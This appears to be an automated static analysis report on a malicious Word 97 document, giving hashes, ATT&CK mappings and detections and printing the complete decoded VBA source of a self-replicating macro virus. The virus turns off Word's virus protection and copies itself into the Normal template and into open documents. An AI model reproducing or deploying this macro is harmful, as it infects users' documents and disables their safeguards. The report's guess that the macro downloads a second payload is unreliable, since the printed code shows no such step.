Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c998060809032ff…

MALICIOUS

Office (OLE)

412.0 KB Created: 2000-11-20 12:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1d3ca8c7ebad7873ebfc29380705e89f SHA-1: 6cdd23ee6be8f0119c27b175ca3aa6a389d1eab7 SHA-256: 8c998060809032ff55fb0968795fa297437046c45b5ef10222a1fa8aa6d459d0
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to execute code upon opening the document. The macro attempts to copy itself to the Normal template, suggesting an attempt at persistence or to infect other documents. The ClamAV detection 'Doc.Trojan.Hisp-1' further indicates malicious intent, likely to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Hisp-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hisp-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1066 bytes
SHA-256: c7cbe46ef45111758bcd7a225f39810423f8b3dcf464291e5420e95623746142
Detection
ClamAV: Doc.Trojan.Hisp-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<HISpeedFuck>
'Coded by Destroyer Inc° 15.03.2000
Private Sub Document_Close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If ad.Lines(1, 1) <> "'<HISpeedFuck>" Then
       ad.DeleteLines 1, ad.CountofLines
       ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
    End If
    If nt.Lines(1, 1) <> "'<HISpeedFuck>" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
        NormalTemplate.Save
    End If
End Sub
Private Sub Document_New()
Document_Close
End Sub
Private Sub Document_Open()
Document_Close
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_911684018/Ole10Native 1732 bytes
SHA-256: ac5b03b85bf0a5d6131a60ba41b10c9fae80450fd2a183b9e69176aae91ad425